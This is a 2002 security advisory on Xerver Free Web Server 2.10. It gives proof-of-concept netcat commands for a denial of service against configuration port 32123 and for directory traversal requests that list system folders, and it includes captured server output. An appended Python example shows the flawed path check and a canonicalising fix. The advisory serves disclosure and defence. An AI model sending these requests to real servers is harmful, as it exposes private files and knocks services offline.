Xerver-2.10.txt

08 Mar 2002. Reported by Alex Hernandez. Type: packetstorm. Source: packetstormsecurity.com

Xerver Free Web Server 2.10 has vulnerabilities allowing file disclosure and Denial of Service attacks.

`  
------oOo------  
Xerver Free Web Server 2.10 file Disclosure & DoS (Denial of Service Attack).  
------oOo------  
  
Company Affected: www.JavaScript.nu  
Version: v2.10  
Date Added: 02-27-02  
Size: 287 KB  
OS Affected: Windows ALL, Linux ALL, BSD ALL, Solaris ALL, MAC ALL.
  
Author:  
  
** Alex Hernandez <[email protected]>  
** Thanks all the people from Spain and Argentina.  
** Special Greets: White-B, Pablo S0r, Paco Spain, G.Maggiotti.  
  
Also a greet to "KF" <[email protected]>
http://www.snosoft.com for inviting me to participate in more
research about the Bugs, Exploits and Vulnerabilities :-)
thanks friend, you have published excellent bugs :X
  
----=[Brief Description]=------------  
  
  
Xerver Free Web Server is a tiny web server allowing you to run CGI/perl scripts on   
your computer. Xerver includes features such as: Allow/forbid directory listing,   
create your own error pages ("404 File Not Found"), allow/deny CGI-scripts, choose   
your own index file extensions, share/unshare hidden files or files with certain   
file extensions, share unlimited folders etc. Xerver is a tiny, fast and free web   
server, but is still advanced and supports both HTTP/1.1 and HTTP/1.0 and all HTTP   
methods (GET, POST and HEAD).
  
  
----=[Summary]=----------------------  
  
Two vulnerabilities exist:


Port 32123 is normally the server's configuration port. There is a method to crash
the system through it by requesting the drive C:\ repeatedly. A second bug lets any
remote user see all the files on the system, including the server's own configuration:
even when the services have been configured to deny folders or files, any user can
reach them remotely through port 80.
  
  
------oOo------  
Proof of concept  
  
  
DoS  
  
http://localhost:32123   
  
$ printf "GET /`perl -e 'print "C:/"x500000'`\r\n\r\n" |nc -vvn 127.0.0.1 32123  
  
  
Exploitation:
  
Example 1:  
  
$ nc -vvn 127.0.0.1 80  
(UNKNOWN) [127.0.0.1] 80 (?) open  
GET /unix/ALEX/Xerver2.10/../../../ HTTP/1.0  
HTTP/1.1 200 OK  
Date: March 6, 2002 8:52:51 PM CST  
Server: Xerver_v2  
Connection: close  
Location: /  
Content-Type: text/html  
  
<HTML><HEAD><TITLE>Directory Listing for /</TITLE></HEAD><BODY BGCOLOR=white COL  
OR=black><FONT FACE="tahoma, arial, verdana"><H2>Directory Listing for /</H2></F  
ONT><PRE>&nbsp;&nbsp;&nbsp;&nbsp;<B>File name File size&nb  
sp;&nbsp;&nbsp;&nbsp;&nbsp;Last modified</B>  
  
  
Program Files  
--------------------------------------------------------------------------------  
<A HREF="Program Files" STYLE="text-decoration: none;"><IMG SRC="/Image:showFold  
er" BORDER=0> Program Files</A>  
--------------------------------------------------------------------------------  
  
RECYCLER  
--------------------------------------------------------------------------------  
<A HREF="RECYCLER" STYLE="text-decoration: none;"><IMG SRC="/Image:showFolder" B  
ORDER=0> RECYCLER</A>  
--------------------------------------------------------------------------------  
  
WINNT  
--------------------------------------------------------------------------------  
<A HREF="WINNT" STYLE="text-decoration: none;"><IMG SRC="/Image:showFolder" BORD  
ER=0> WINNT</A>  
-------------------------------------------------------------------------------  
  
[...]  
  
or via web:  
  
  
  
http://localhost/unix/ALEX/Xerver2.10/../../../   
  
Directory Listing for /  
  
File name File size Last modified  
  
$unix  
ALEX  
Documents and Settings  
My Downloads  
Program Files  
RECYCLER  
  
[...]  
  
  
Example 2:  
  
$ nc -vvn 127.0.0.1 80  
(UNKNOWN) [127.0.0.1] 80 (?) open  
GET /unix/ALEX/Xerver2.10/../../../WINNT/system32/ HTTP 1.0  
  
The result is:
  
Directory Listing for /WINNT/system32/  
  
  
File name File size Last modified  
../  
AdCache  
CatRoot  
Com  
DTCLog  
DirectX  
GroupPolicy  
Hummbird  
IOSUBSYS  
Macromed  
Microsoft  
  
[...]  
  
  
------oOo------------------------------------  
Vendor Response:
The vendor was notified:
"Omid Rouhani" [email protected]
http://www.JavaScript.nu
Temporary patch: restrict files and directories
  
Alex Hernandez <[email protected]> (c) 2002.  
  
------oOo------------------------------------
`
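
The bug class behind both findings, with its fix, as an added example that is not part of the advisory and is not Xerver's code. It assumes the server maps URL paths directly to filesystem paths and serves only allow-listed shared folders; `SHARED`, `MAX_TARGET_LEN` and all function names are hypothetical.

```python
import posixpath
from urllib.parse import unquote

# Assumptions (not taken from Xerver's source): URL paths map straight onto
# filesystem paths, and only folders on this allow-list may be served.
SHARED = ["/unix/ALEX/Xerver2.10"]   # constructed from the advisory's request path
MAX_TARGET_LEN = 4096                # assumed cap on the request-target length


def naive_is_allowed(target):
    """Flawed check: compares the raw string, so '..' after a shared prefix passes."""
    return any(target.startswith(s) for s in SHARED)


def canonical_path(target):
    """Decode and normalise a request target; return None if it must be rejected."""
    if len(target) > MAX_TARGET_LEN:     # bound the input before doing any work on it
        return None
    path = unquote(target.split("?", 1)[0]).replace("\\", "/")
    if not path.startswith("/") or "\x00" in path:
        return None
    return posixpath.normpath(path)      # collapses '.', '..' and repeated '/'


def is_allowed(target):
    """Allow-list check on the canonical path, compared component by component."""
    path = canonical_path(target)
    if path is None:
        return False
    parts = path.split("/")
    for shared in SHARED:
        prefix = shared.split("/")
        # Whole-component match, so '/unix/ALEX/Xerver2.10-private' is not a hit.
        if parts[:len(prefix)] == prefix:
            return True
    return False


if __name__ == "__main__":
    # Request targets taken from the advisory's examples, plus one legitimate one.
    for t in ("/unix/ALEX/Xerver2.10/index.html",
              "/unix/ALEX/Xerver2.10/../../../",
              "/unix/ALEX/Xerver2.10/../../../WINNT/system32/"):
        print(f"{t!r}: naive={naive_is_allowed(t)} canonical={is_allowed(t)}")
```

On a case-insensitive filesystem the comparison would also need case folding, and a server that follows symbolic links has to resolve them before the check.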
